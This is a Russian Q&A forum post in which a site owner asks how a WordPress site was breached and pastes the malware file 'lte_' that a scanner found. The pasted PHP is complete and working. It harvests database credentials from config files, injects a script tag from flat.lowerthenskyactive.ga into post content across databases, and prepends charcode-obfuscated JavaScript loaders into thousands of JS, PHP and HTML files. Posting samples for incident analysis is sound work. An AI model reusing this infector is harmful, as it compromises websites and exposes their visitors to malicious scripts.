Задать вопрос
  • Как найти место взлома wordpress?

    @jahtaka
    Там каким-то образом кладётся файлик "lte_", я пока не определил способ его размещения на сервере. Из него начиает постить код в PHP JS HTM файлы и в базу с редиректом. Тысячами.

    Ai-bolit всё это находит, благодаря ему как раз и обнаружил.

    Файл "lte_" :
    spoiler
    <?php echo "ssqqss>>>";
    error_reporting(0);
    ini_set('display_errors',0);
    
    
    search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js");
    die();
    
      
    function get_var_reg($pat,$text) {
    	
    	if ($c = preg_match_all ("/".$pat."/is", $text, $matches))
    	{
    		return $matches[1][0];
    	}
    		
    	return "";
    }
    function search_file_ms($dir,$file_to_search){
    
    $search_array = array();
    
    $files = scandir($dir);
    
    if($files == false) {
    	
    	$dir = substr($dir, 0, -3);
    	if (strpos($dir, '../') !== false) {
    		
    		@search_file_ms( $dir,$file_to_search);
    		return;
    	}
    	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
    		
    		@search_file_ms( $dir,$file_to_search);
    		return;
    	}
    }
    
    foreach($files as $key => $value){
    
    
        $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
    
        if(!is_dir($path)) {
    		if (strpos($value,$file_to_search) !== false) {
    		
    			show_sitenames($path);
    			
    			
    			
            }
    
        } else if($value != "." && $value != "..") {
    
            @search_file_ms($path, $file_to_search);
    
        }  
     } 
    }
    function show_sitenames($file){
    	$content = @file_get_contents($file);
    	if(strpos($content, "DB_NAME") !== false) {
    	
    	
    	$db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]",$content);
    	$host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]",$content);
    	$user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]",$content);
    	$pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]",$content);
    
    
    // Create connection
    $conn = new mysqli($host, $user, $pass);
    
    // Check connection
    if ($conn->connect_error) {
     
    } else { 
    
    
    $q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";
    $result = $conn->query($q);
    if ($result->num_rows > 0) {
        while($row = $result->fetch_assoc()) {
    		$q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]."  LIMIT 1 ";
    	$result2 = $conn->query($q2);
    	if ($result2->num_rows > 0) {
    		while($row2 = $result2->fetch_assoc()) {
    			$val = $row2['post_content'];
    			if(strpos($val, "flat.lowerthenskyactive.ga") === false){
    				if(strpos($val, "flat.lowerthenskyactive.ga") === false){
    					
    				
    					$q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src='https://flat.lowerthenskyactive.ga/m.js?n=ns1' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%flat.lowerthenskyactive.ga%'";
    					$conn->query($q3);
    					echo "sql:" . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"];
    				
    				} else {
    				
    				}
    
    			} 
    		}
    	} else {
    	}
        }
    } else {
    }
    $conn->close();
    }
    }
    }
    
    function search_file($dir,$file_to_search){
    
    $files = @scandir($dir);
    
    if($files == false) {
    	
    	$dir = substr($dir, 0, -3);
    	if (strpos($dir, '../') !== false) {
    		
    		@search_file( $dir,$file_to_search);
    		return;
    	}
    	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
    		
    		@search_file( $dir,$file_to_search);
    		return;
    	}
    }
    
    foreach($files as $key => $value){
    
        $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
    	
        if(!is_dir($path)) {
    		if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {
    
    		make_it($path);
    
        } }else if($value != "." && $value != "..") {
    
            search_file($path, $file_to_search);
    
        }  
     } 
    
    }
    
    function search_file_index($dir,$file_to_search){
    
    $files = @scandir($dir);
    
    if($files == false) {
    	
    	$dir = substr($dir, 0, -3);
    	if (strpos($dir, '../') !== false) {
    		
    		search_file_index( $dir,$file_to_search);
    		return;
    	}
    	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
    		
    		search_file_index( $dir,$file_to_search);
    		return;
    	}
    }
    
    foreach($files as $key => $value){
    
        $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
    	
        if(!is_dir($path)) {
    		if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {
    
    		make_it_index($path);
    
        } }else if($value != "." && $value != "..") {
    
            search_file_index($path, $file_to_search);
    
        }  
     } 
    
    }
    function search_file_js($dir,$file_to_search){
    
    $files = @scandir($dir);
    if($files == false) {
    	
    	$dir = substr($dir, 0, -3);
    	if (strpos($dir, '../') !== false) {
    		
    		@search_file_js( $dir,$file_to_search);
    		return;
    	}
    	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
    		
    		@search_file_js( $dir,$file_to_search);
    		return;
    	}
    }
    
    foreach($files as $key => $value){
    
        $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
    	
        if(!is_dir($path)) {
    		if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) {
    
    		make_it_js($path);
    
        } }else if($value != "." && $value != "..") {
    
            search_file_js($path, $file_to_search);
    
        }  
     } 
    
    }
    
    function make_it_js($f){
    			$g = file_get_contents($f);
    			
    										
    
    if (strpos($g, '102,108,97,116,46,108,111,119,101,114,116,104,101,110,115,107,121,97,99,116,105,118,101,46,103,97') !== false) {
    
    } else {
    
    $l2 = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,102,108,97,116,46,108,111,119,101,114,116,104,101,110,115,107,121,97,99,116,105,118,101,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();";
    $g = file_get_contents($f);
    $g = $l2.$g;
    @system('chmod 777 '.$f);
    @file_put_contents($f,$g);
    echo "js:".$f."\r\n";
    }
    
    			
    }
    function make_it_index($f){
    $g = file_get_contents($f);
    if (strpos($g, '102,108,97,116,46,108,111,119,101,114,116,104,101,110,115,107,121,97,99,116,105,118,101,46,103,97') !== false || strpos($g, 'flat.lowerthenskyactive.ga') !== false) {
    
    } else {
    $l2 = "<script type='text/javascript' src='https://flat.lowerthenskyactive.ga/m.js?n=nb5'></script>";
    $g = file_get_contents($f);
    $g = $l2.$g;
    
    @system('chmod 777 '.$f);
    @file_put_contents($f,$g);
    echo "in:".$f."\r\n";
    
    
    			}
    }
    
    function make_it($f){
    $g = file_get_contents($f);
    if (strpos($g, '102,108,97,116,46,108,111,119,101,114,116,104,101,110,115,107,121,97,99,116,105,118,101,46,103,97') !== false) {
    
    } else {
    $l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,102,108,97,116,46,108,111,119,101,114,116,104,101,110,115,107,121,97,99,116,105,118,101,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>";
    if (strpos($g, '<head>') !== false) {
    $b = str_replace("<head>","<head>".$l2,$g);
    @system('chmod 777 '.$f);
    @file_put_contents($f,$b);
    echo "hh:".$f."\r\n";
    }
    if (strpos($g, '</head>') !== false) {
    $b = str_replace("</head>",$l2."</head>",$g);
    @system('chmod 777 '.$f);
    @file_put_contents($f,$b);
    echo "hh:".$f."\r\n";
    }
    
    
    			}
    }
    Ответ написан
    4 комментария